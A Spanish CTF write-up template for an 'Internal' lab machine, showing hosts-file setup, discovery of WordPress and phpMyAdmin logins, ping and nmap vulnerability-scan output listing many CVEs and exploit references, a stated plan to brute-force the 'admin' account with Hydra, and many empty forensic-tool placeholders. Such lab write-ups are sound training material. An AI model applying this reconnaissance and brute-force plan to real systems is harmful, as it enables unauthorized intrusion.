👨‍🏫WRITEUP RESUMEN

👁️ RECONOCIMIENTO PASIVO ✔️

AUDITORIA DE: ((RELEVANT))

RECONOCIMIENTO PASIVO

BROWSER --------------------------------->https://www.paimon.com.ar/
```
┌──(root㉿kali)-[~]
└─# echo "10.10.7.3  internal.thm" | sudo tee -a /etc/hosts

10.10.7.3  internal.thm


URL:

http://internal.thm/
```
- CONCLUSION: VEMOS UN SERVIDOR APACHE POR EL PUERTO 80
Apache2 Ubuntu Default Page_ It works

BROWSER --------------------------------->https://www.paimon.com.ar/

┌──(root㉿kali)-[~]
└─# echo "10.10.7.3  internal.thm" | sudo tee -a /etc/hosts

10.10.7.3  internal.thm

URL:

http://internal.thm/blog/

CONCLUSION: VEMOS EL SITIO OFICIAL DE INTERNAL.

BROWSER --------------------------------->https://www.paimon.com.ar/

┌──(root㉿kali)-[~]
└─# echo "10.10.7.3  internal.thm" | sudo tee -a /etc/hosts

10.10.7.3  internal.thm

URL:

http://internal.thm/phpmyadmin/

CONCLUSION: VEMOS UN LOGIN PHPMYADMIN.

BROWSER --------------------------------->https://www.paimon.com.ar/

┌──(root㉿kali)-[~]
└─# echo "10.10.7.3  internal.thm" | sudo tee -a /etc/hosts

10.10.7.3  internal.thm

URL:

http://internal.thm/wordpress/wp-login.php

CONCLUSION: VEMOS UN LOGIN DE WORPRES PHP

BROWSER --------------------------------->https://www.paimon.com.ar/

┌──(root㉿kali)-[~]
└─# echo "10.10.7.3  internal.thm" | sudo tee -a /etc/hosts

10.10.7.3  internal.thm

URL:

http://internal.thm/blog/wp-login.php

CONCLUSION: VEMOS EL LOGIN WORPRESS APARENTE DEL SITIO WEB INTERNAL

BROWSER --------------------------------->https://www.paimon.com.ar/
```
http://internal.thm/blog/index.php/author/admin/
```
post_posible_usuario_admin_en_internal
- CONCLUSION: VEMOS EN EL SITIO BLOG UQE HAY UN POSTEO DE UN POSIBLE USUARIO 'ADMIN' SAI QUE INTENTAREMOS FUERZA BRUTA CON ESTE POISIBLE USUARIO CON HYDRA.

WAPPALYZER --------------------------------->https://www.wappalyzer.com/

Gestor de Contenido

WordPress
5.4.2
Gestor de Bases de Datos

phpMyAdmin
Herramienta de Documentación

Sphinx
Blog

WordPress
5.4.2
Tipografía

Google Font API

Twitter Emoji (Twemoji)
12.1.3
Miscelánea

Pygments

RSS
Editor

CodeMirror
5.4.0
Servidor Web

Apache HTTP Server
2.4.29
Lenguaje de programación

PHP
Sistema Operativo

Ubuntu
Base de Datos

MySQL
Librerías JavaScript

Underscore.js
1.8.3

jQuery Migrate
1.4.1

jQuery UI
1.11.4

jQuery
1.12.4
Temas de WordPress

Twenty Seventeen

CONCLUSION: VEMOS TECNOLOGIAS DE WORDPRESS DEL SITIO WEB

🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫

🔬 ANALISIS FORENSE ❌

ANALISIS FORENSE

AUTOPSY👈 https://tools.kali.org/forensics/autopsy--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
AUTOPSY👈 https://tools.kali.org/forensics/autopsy--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
AUTOPSY👈 https://tools.kali.org/forensics/autopsy--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
VOLATILITY👈 https://github.com/volatilityfoundation/volatility--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
VOLATILITY👈 https://github.com/volatilityfoundation/volatility--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
VOLATILITY👈 https://github.com/volatilityfoundation/volatility--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FTK👈 https://www.accessdata.com/products-services/forensic-toolkit-ftk--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FTK👈 https://www.accessdata.com/products-services/forensic-toolkit-ftk--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FTK👈 https://www.accessdata.com/products-services/forensic-toolkit-ftk--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
DFF👈 (Digital Forensics Framework) https://github.com/arxsys/dff
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TSK👈 (The Sleuth Kit) https://tools.kali.org/forensics/sleuthkit
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
X-WAYS Forensics👈 https://www.x-ways.net/forensics/index-m.html
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FOREMOST👈 https://github.com/korczis/foremost
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HxD👈 https://mh-nexus.de/en/hxd/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HxD👈 https://mh-nexus.de/en/hxd/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WIRESHARK👈 --------------------------------->https://github.com/wireshark/wireshark --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WIRESHARK👈 --------------------------------->https://github.com/wireshark/wireshark --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WIRESHARK👈 --------------------------------->https://github.com/wireshark/wireshark --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TSHARK👈 --------------------------------->https://www.kali.org/tools/wireshark/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TSHARK👈 --------------------------------->https://www.kali.org/tools/wireshark/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TSHARK👈 --------------------------------->https://www.kali.org/tools/wireshark/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
XXD👈 https://tools.kali.org/forensics/xxd
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
XXD👈 https://tools.kali.org/forensics/xxd
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
XXD👈 https://tools.kali.org/forensics/xxd
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦

👊 RECONOCIMIENTO ACTIVO ✔️

RECONOCIMIENTO ACTIVO

PING --------------------------------->https://www.kali.org/tools/fping/

┌──(root㉿kali)-[~]
└─# ping 10.10.7.3   
PING 10.10.7.3 (10.10.7.3) 56(84) bytes of data.
64 bytes from 10.10.7.3: icmp_seq=1 ttl=64 time=0.879 ms
64 bytes from 10.10.7.3: icmp_seq=2 ttl=64 time=0.462 ms
64 bytes from 10.10.7.3: icmp_seq=3 ttl=64 time=0.401 ms
^C
--- 10.10.7.3 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2038ms
rtt min/avg/max/mdev = 0.401/0.580/0.879/0.212 ms

CONCLUSION: VEMOS UN TTL DE 64 QUE NOS INDICA QUE SERIA UNA MAQUINA LINUX

NMAP --------------------------------->https://nmap.org/ --->PDF-TOOL

┌──(root㉿kali)-[~]
└─# nmap -sS -p- 10.10.7.3    
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-24 03:29 UTC
Nmap scan report for ip-10-10-7-3.eu-west-1.compute.internal (10.10.7.3)
Host is up (0.0068s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 02:1F:8F:6A:E6:F3 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 3.63 seconds


---------------------------------------------

┌──(root㉿kali)-[~]
└─# nmap -sS -sV -O -script='vuln' 10.10.7.3
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-24 03:22 UTC
Nmap scan report for ip-10-10-7-3.eu-west-1.compute.internal (10.10.7.3)
Host is up (0.00038s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:7.6p1: 
|       PRION:CVE-2019-6111     5.8     https://vulners.com/prion/PRION:CVE-2019-6111
|       EXPLOITPACK:98FE96309F9524B8C84C508837551A19    5.8     https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19   *EXPLOIT*
|       EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97    5.8     https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97   *EXPLOIT*
|       EDB-ID:46516    5.8     https://vulners.com/exploitdb/EDB-ID:46516      *EXPLOIT*
|       EDB-ID:46193    5.8     https://vulners.com/exploitdb/EDB-ID:46193      *EXPLOIT*
|       CVE-2019-6111   5.8     https://vulners.com/cve/CVE-2019-6111
|       1337DAY-ID-32328        5.8     https://vulners.com/zdt/1337DAY-ID-32328        *EXPLOIT*
|       1337DAY-ID-32009        5.8     https://vulners.com/zdt/1337DAY-ID-32009        *EXPLOIT*
|       SSH_ENUM        5.0     https://vulners.com/canvas/SSH_ENUM     *EXPLOIT*
|       PRION:CVE-2018-15919    5.0     https://vulners.com/prion/PRION:CVE-2018-15919
|       PRION:CVE-2018-15473    5.0     https://vulners.com/prion/PRION:CVE-2018-15473
|       PACKETSTORM:150621      5.0     https://vulners.com/packetstorm/PACKETSTORM:150621      *EXPLOIT*
|       MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS-        5.0     https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS-        *EXPLOIT*
|       EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0    5.0     https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0   *EXPLOIT*
|       EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283    5.0     https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283   *EXPLOIT*
|       EDB-ID:45939    5.0     https://vulners.com/exploitdb/EDB-ID:45939      *EXPLOIT*
|       CVE-2018-15919  5.0     https://vulners.com/cve/CVE-2018-15919
|       CVE-2018-15473  5.0     https://vulners.com/cve/CVE-2018-15473
|       1337DAY-ID-31730        5.0     https://vulners.com/zdt/1337DAY-ID-31730        *EXPLOIT*
|       PRION:CVE-2019-16905    4.4     https://vulners.com/prion/PRION:CVE-2019-16905
|       CVE-2020-14145  4.3     https://vulners.com/cve/CVE-2020-14145
|       PRION:CVE-2019-6110     4.0     https://vulners.com/prion/PRION:CVE-2019-6110
|       PRION:CVE-2019-6109     4.0     https://vulners.com/prion/PRION:CVE-2019-6109
|       CVE-2019-6110   4.0     https://vulners.com/cve/CVE-2019-6110
|       CVE-2019-6109   4.0     https://vulners.com/cve/CVE-2019-6109
|       PRION:CVE-2018-20685    2.6     https://vulners.com/prion/PRION:CVE-2018-20685
|       CVE-2018-20685  2.6     https://vulners.com/cve/CVE-2018-20685
|       PACKETSTORM:151227      0.0     https://vulners.com/packetstorm/PACKETSTORM:151227      *EXPLOIT*
|_      1337DAY-ID-30937        0.0     https://vulners.com/zdt/1337DAY-ID-30937        *EXPLOIT*
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum: 
|   /blog/: Blog
|   /phpmyadmin/: phpMyAdmin
|   /wordpress/wp-login.php: Wordpress login page.
|_  /blog/wp-login.php: Wordpress login page.
|_http-server-header: Apache/2.4.29 (Ubuntu)
| vulners: 
|   cpe:/a:apache:http_server:2.4.29: 
|       CVE-2019-9517   7.8     https://vulners.com/cve/CVE-2019-9517
|       PACKETSTORM:176334      7.5     https://vulners.com/packetstorm/PACKETSTORM:176334      *EXPLOIT*
|       PACKETSTORM:171631      7.5     https://vulners.com/packetstorm/PACKETSTORM:171631      *EXPLOIT*
|       OSV:BIT-APACHE-2023-25690       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2023-25690
|       OSV:BIT-APACHE-2022-31813       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2022-31813
|       OSV:BIT-APACHE-2022-23943       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2022-23943
|       OSV:BIT-APACHE-2022-22720       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2022-22720
|       OSV:BIT-APACHE-2021-44790       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2021-44790
|       OSV:BIT-APACHE-2021-42013       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2021-42013
|       OSV:BIT-APACHE-2021-41773       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2021-41773
|       OSV:BIT-APACHE-2021-39275       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2021-39275
|       OSV:BIT-APACHE-2021-26691       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2021-26691
|       OSV:BIT-APACHE-2020-11984       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2020-11984
|       MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE-       7.5     https://vulners.com/metasploit/MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE-       *EXPLOIT*
|       MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH-       7.5     https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH-       *EXPLOIT*
|       F9C0CD4B-3B60-5720-AE7A-7CC31DB839C5    7.5     https://vulners.com/githubexploit/F9C0CD4B-3B60-5720-AE7A-7CC31DB839C5*EXPLOIT*
|       EDB-ID:51193    7.5     https://vulners.com/exploitdb/EDB-ID:51193      *EXPLOIT*
|       EDB-ID:50512    7.5     https://vulners.com/exploitdb/EDB-ID:50512      *EXPLOIT*
|       EDB-ID:50446    7.5     https://vulners.com/exploitdb/EDB-ID:50446      *EXPLOIT*
|       EDB-ID:50406    7.5     https://vulners.com/exploitdb/EDB-ID:50406      *EXPLOIT*
|       E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6    7.5     https://vulners.com/githubexploit/E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6*EXPLOIT*
|       CVE-2023-25690  7.5     https://vulners.com/cve/CVE-2023-25690
|       CVE-2022-31813  7.5     https://vulners.com/cve/CVE-2022-31813
|       CVE-2022-23943  7.5     https://vulners.com/cve/CVE-2022-23943
|       CVE-2022-22720  7.5     https://vulners.com/cve/CVE-2022-22720
|       CVE-2021-44790  7.5     https://vulners.com/cve/CVE-2021-44790
|       CVE-2021-39275  7.5     https://vulners.com/cve/CVE-2021-39275
|       CVE-2021-26691  7.5     https://vulners.com/cve/CVE-2021-26691
|       CNVD-2022-73123 7.5     https://vulners.com/cnvd/CNVD-2022-73123
|       CNVD-2022-03225 7.5     https://vulners.com/cnvd/CNVD-2022-03225
|       CNVD-2021-102386        7.5     https://vulners.com/cnvd/CNVD-2021-102386
|       CC15AE65-B697-525A-AF4B-38B1501CAB49    7.5     https://vulners.com/githubexploit/CC15AE65-B697-525A-AF4B-38B1501CAB49*EXPLOIT*
|       9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5    7.5     https://vulners.com/githubexploit/9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5*EXPLOIT*
|       8713FD59-264B-5FD7-8429-3251AB5AB3B8    7.5     https://vulners.com/githubexploit/8713FD59-264B-5FD7-8429-3251AB5AB3B8*EXPLOIT*
|       6A0A657E-8300-5312-99CE-E11F460B1DBF    7.5     https://vulners.com/githubexploit/6A0A657E-8300-5312-99CE-E11F460B1DBF*EXPLOIT*
|       61075B23-F713-537A-9B84-7EB9B96CF228    7.5     https://vulners.com/githubexploit/61075B23-F713-537A-9B84-7EB9B96CF228*EXPLOIT*
|       5C1BB960-90C1-5EBF-9BEF-F58BFFDFEED9    7.5     https://vulners.com/githubexploit/5C1BB960-90C1-5EBF-9BEF-F58BFFDFEED9*EXPLOIT*
|       5312D04F-9490-5472-84FA-86B3BBDC8928    7.5     https://vulners.com/githubexploit/5312D04F-9490-5472-84FA-86B3BBDC8928*EXPLOIT*
|       52E13088-9643-5E81-B0A0-B7478BCF1F2C    7.5     https://vulners.com/githubexploit/52E13088-9643-5E81-B0A0-B7478BCF1F2C*EXPLOIT*
|       3F17CA20-788F-5C45-88B3-E12DB2979B7B    7.5     https://vulners.com/githubexploit/3F17CA20-788F-5C45-88B3-E12DB2979B7B*EXPLOIT*
|       22DCCD26-B68C-5905-BAC2-71D10DE3F123    7.5     https://vulners.com/githubexploit/22DCCD26-B68C-5905-BAC2-71D10DE3F123*EXPLOIT*
|       2108729F-1E99-54EF-9A4B-47299FD89FF2    7.5     https://vulners.com/githubexploit/2108729F-1E99-54EF-9A4B-47299FD89FF2*EXPLOIT*
|       1337DAY-ID-39214        7.5     https://vulners.com/zdt/1337DAY-ID-39214        *EXPLOIT*
|       1337DAY-ID-38427        7.5     https://vulners.com/zdt/1337DAY-ID-38427        *EXPLOIT*
|       1337DAY-ID-37777        7.5     https://vulners.com/zdt/1337DAY-ID-37777        *EXPLOIT*
|       1337DAY-ID-36952        7.5     https://vulners.com/zdt/1337DAY-ID-36952        *EXPLOIT*
|       1337DAY-ID-34882        7.5     https://vulners.com/zdt/1337DAY-ID-34882        *EXPLOIT*
|       EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB    7.2     https://vulners.com/exploitpack/EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB   *EXPLOIT*
|       EDB-ID:46676    7.2     https://vulners.com/exploitdb/EDB-ID:46676      *EXPLOIT*
|       CVE-2019-0211   7.2     https://vulners.com/cve/CVE-2019-0211
|       1337DAY-ID-32502        7.2     https://vulners.com/zdt/1337DAY-ID-32502        *EXPLOIT*
|       OSV:BIT-APACHE-2021-40438       6.8     https://vulners.com/osv/OSV:BIT-APACHE-2021-40438
|       OSV:BIT-APACHE-2020-35452       6.8     https://vulners.com/osv/OSV:BIT-APACHE-2020-35452
|       FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8    6.8     https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8*EXPLOIT*
|       CVE-2021-40438  6.8     https://vulners.com/cve/CVE-2021-40438
|       CVE-2020-35452  6.8     https://vulners.com/cve/CVE-2020-35452
|       CVE-2018-1312   6.8     https://vulners.com/cve/CVE-2018-1312
|       CVE-2017-15715  6.8     https://vulners.com/cve/CVE-2017-15715
|       CNVD-2022-03224 6.8     https://vulners.com/cnvd/CNVD-2022-03224
|       AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C    6.8     https://vulners.com/githubexploit/AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C*EXPLOIT*
|       8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2    6.8     https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2*EXPLOIT*
|       4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332    6.8     https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332*EXPLOIT*
|       4373C92A-2755-5538-9C91-0469C995AA9B    6.8     https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B*EXPLOIT*
|       36618CA8-9316-59CA-B748-82F15F407C4F    6.8     https://vulners.com/githubexploit/36618CA8-9316-59CA-B748-82F15F407C4F*EXPLOIT*
|       0095E929-7573-5E4A-A7FA-F6598A35E8DE    6.8     https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE*EXPLOIT*
|       OSV:BIT-APACHE-2022-28615       6.4     https://vulners.com/osv/OSV:BIT-APACHE-2022-28615
|       OSV:BIT-APACHE-2021-44224       6.4     https://vulners.com/osv/OSV:BIT-APACHE-2021-44224
|       OSV:BIT-2023-31122      6.4     https://vulners.com/osv/OSV:BIT-2023-31122
|       CVE-2022-28615  6.4     https://vulners.com/cve/CVE-2022-28615
|       CVE-2021-44224  6.4     https://vulners.com/cve/CVE-2021-44224
|       CVE-2019-10082  6.4     https://vulners.com/cve/CVE-2019-10082
|       CVE-2019-0217   6.0     https://vulners.com/cve/CVE-2019-0217
|       OSV:BIT-APACHE-2022-22721       5.8     https://vulners.com/osv/OSV:BIT-APACHE-2022-22721
|       OSV:BIT-APACHE-2020-1927        5.8     https://vulners.com/osv/OSV:BIT-APACHE-2020-1927
|       CVE-2022-22721  5.8     https://vulners.com/cve/CVE-2022-22721
|       CVE-2020-1927   5.8     https://vulners.com/cve/CVE-2020-1927
|       CVE-2019-10098  5.8     https://vulners.com/cve/CVE-2019-10098
|       1337DAY-ID-33577        5.8     https://vulners.com/zdt/1337DAY-ID-33577        *EXPLOIT*
|       OSV:BIT-APACHE-2022-36760       5.1     https://vulners.com/osv/OSV:BIT-APACHE-2022-36760
|       CVE-2022-36760  5.1     https://vulners.com/cve/CVE-2022-36760
|       OSV:BIT-APACHE-2023-45802       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2023-45802
|       OSV:BIT-APACHE-2023-43622       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2023-43622
|       OSV:BIT-APACHE-2023-31122       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2023-31122
|       OSV:BIT-APACHE-2023-27522       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2023-27522
|       OSV:BIT-APACHE-2022-37436       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2022-37436
|       OSV:BIT-APACHE-2022-30556       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2022-30556
|       OSV:BIT-APACHE-2022-30522       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2022-30522
|       OSV:BIT-APACHE-2022-29404       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2022-29404
|       OSV:BIT-APACHE-2022-28614       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2022-28614
|       OSV:BIT-APACHE-2022-28330       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2022-28330
|       OSV:BIT-APACHE-2022-26377       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2022-26377
|       OSV:BIT-APACHE-2022-22719       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2022-22719
|       OSV:BIT-APACHE-2021-41524       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2021-41524
|       OSV:BIT-APACHE-2021-36160       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2021-36160
|       OSV:BIT-APACHE-2021-34798       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2021-34798
|       OSV:BIT-APACHE-2021-33193       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2021-33193
|       OSV:BIT-APACHE-2021-31618       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2021-31618
|       OSV:BIT-APACHE-2021-30641       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2021-30641
|       OSV:BIT-APACHE-2021-26690       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2021-26690
|       OSV:BIT-APACHE-2020-9490        5.0     https://vulners.com/osv/OSV:BIT-APACHE-2020-9490
|       OSV:BIT-APACHE-2020-1934        5.0     https://vulners.com/osv/OSV:BIT-APACHE-2020-1934
|       OSV:BIT-APACHE-2020-13950       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2020-13950
|       OSV:BIT-2023-45802      5.0     https://vulners.com/osv/OSV:BIT-2023-45802
|       OSV:BIT-2023-43622      5.0     https://vulners.com/osv/OSV:BIT-2023-43622
|       F7F6E599-CEF4-5E03-8E10-FE18C4101E38    5.0     https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38*EXPLOIT*
|       E5C174E5-D6E8-56E0-8403-D287DE52EB3F    5.0     https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F*EXPLOIT*
|       DB6E1BBD-08B1-574D-A351-7D6BB9898A4A    5.0     https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A*EXPLOIT*
|       CVE-2023-31122  5.0     https://vulners.com/cve/CVE-2023-31122
|       CVE-2022-37436  5.0     https://vulners.com/cve/CVE-2022-37436
|       CVE-2022-30556  5.0     https://vulners.com/cve/CVE-2022-30556
|       CVE-2022-29404  5.0     https://vulners.com/cve/CVE-2022-29404
|       CVE-2022-28614  5.0     https://vulners.com/cve/CVE-2022-28614
|       CVE-2022-26377  5.0     https://vulners.com/cve/CVE-2022-26377
|       CVE-2022-22719  5.0     https://vulners.com/cve/CVE-2022-22719
|       CVE-2021-34798  5.0     https://vulners.com/cve/CVE-2021-34798
|       CVE-2021-33193  5.0     https://vulners.com/cve/CVE-2021-33193
|       CVE-2021-26690  5.0     https://vulners.com/cve/CVE-2021-26690
|       CVE-2020-9490   5.0     https://vulners.com/cve/CVE-2020-9490
|       CVE-2020-1934   5.0     https://vulners.com/cve/CVE-2020-1934
|       CVE-2019-17567  5.0     https://vulners.com/cve/CVE-2019-17567
|       CVE-2019-10081  5.0     https://vulners.com/cve/CVE-2019-10081
|       CVE-2019-0220   5.0     https://vulners.com/cve/CVE-2019-0220
|       CVE-2019-0196   5.0     https://vulners.com/cve/CVE-2019-0196
|       CVE-2018-17199  5.0     https://vulners.com/cve/CVE-2018-17199
|       CVE-2018-17189  5.0     https://vulners.com/cve/CVE-2018-17189
|       CVE-2018-1333   5.0     https://vulners.com/cve/CVE-2018-1333
|       CVE-2018-1303   5.0     https://vulners.com/cve/CVE-2018-1303
|       CVE-2017-15710  5.0     https://vulners.com/cve/CVE-2017-15710
|       CVE-2006-20001  5.0     https://vulners.com/cve/CVE-2006-20001
|       CNVD-2023-93320 5.0     https://vulners.com/cnvd/CNVD-2023-93320
|       CNVD-2023-80558 5.0     https://vulners.com/cnvd/CNVD-2023-80558
|       CNVD-2022-73122 5.0     https://vulners.com/cnvd/CNVD-2022-73122
|       CNVD-2022-53584 5.0     https://vulners.com/cnvd/CNVD-2022-53584
|       CNVD-2022-53582 5.0     https://vulners.com/cnvd/CNVD-2022-53582
|       CNVD-2022-03223 5.0     https://vulners.com/cnvd/CNVD-2022-03223
|       C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B    5.0     https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B*EXPLOIT*
|       BD3652A9-D066-57BA-9943-4E34970463B9    5.0     https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9*EXPLOIT*
|       B0208442-6E17-5772-B12D-B5BE30FA5540    5.0     https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540*EXPLOIT*
|       A820A056-9F91-5059-B0BC-8D92C7A31A52    5.0     https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52*EXPLOIT*
|       9814661A-35A4-5DB7-BB25-A1040F365C81    5.0     https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81*EXPLOIT*
|       5A864BCC-B490-5532-83AB-2E4109BB3C31    5.0     https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31*EXPLOIT*
|       17C6AD2A-8469-56C8-BBBE-1764D0DF1680    5.0     https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680*EXPLOIT*
|       OSV:BIT-APACHE-2020-11993       4.3     https://vulners.com/osv/OSV:BIT-APACHE-2020-11993
|       FF610CB4-801A-5D1D-9AC9-ADFC287C8482    4.3     https://vulners.com/githubexploit/FF610CB4-801A-5D1D-9AC9-ADFC287C8482*EXPLOIT*
|       FDF4BBB1-979C-5320-95EA-9EC7EB064D72    4.3     https://vulners.com/githubexploit/FDF4BBB1-979C-5320-95EA-9EC7EB064D72*EXPLOIT*
|       FCAF01A0-F921-5DB1-BBC5-850EC2DC5C46    4.3     https://vulners.com/githubexploit/FCAF01A0-F921-5DB1-BBC5-850EC2DC5C46*EXPLOIT*
|       EDB-ID:50383    4.3     https://vulners.com/exploitdb/EDB-ID:50383      *EXPLOIT*
|       E7B177F6-FA62-52FE-A108-4B8FC8112B7F    4.3     https://vulners.com/githubexploit/E7B177F6-FA62-52FE-A108-4B8FC8112B7F*EXPLOIT*
|       E6B39247-8016-5007-B505-699F05FCA1B5    4.3     https://vulners.com/githubexploit/E6B39247-8016-5007-B505-699F05FCA1B5*EXPLOIT*
|       DBF996C3-DC2A-5859-B767-6B2FC38F2185    4.3     https://vulners.com/githubexploit/DBF996C3-DC2A-5859-B767-6B2FC38F2185*EXPLOIT*
|       D0E79214-C9E8-52BD-BC24-093970F5F34E    4.3     https://vulners.com/githubexploit/D0E79214-C9E8-52BD-BC24-093970F5F34E*EXPLOIT*
|       CVE-2020-11993  4.3     https://vulners.com/cve/CVE-2020-11993
|       CVE-2019-10092  4.3     https://vulners.com/cve/CVE-2019-10092
|       CVE-2018-1302   4.3     https://vulners.com/cve/CVE-2018-1302
|       CVE-2018-1301   4.3     https://vulners.com/cve/CVE-2018-1301
|       CVE-2018-11763  4.3     https://vulners.com/cve/CVE-2018-11763
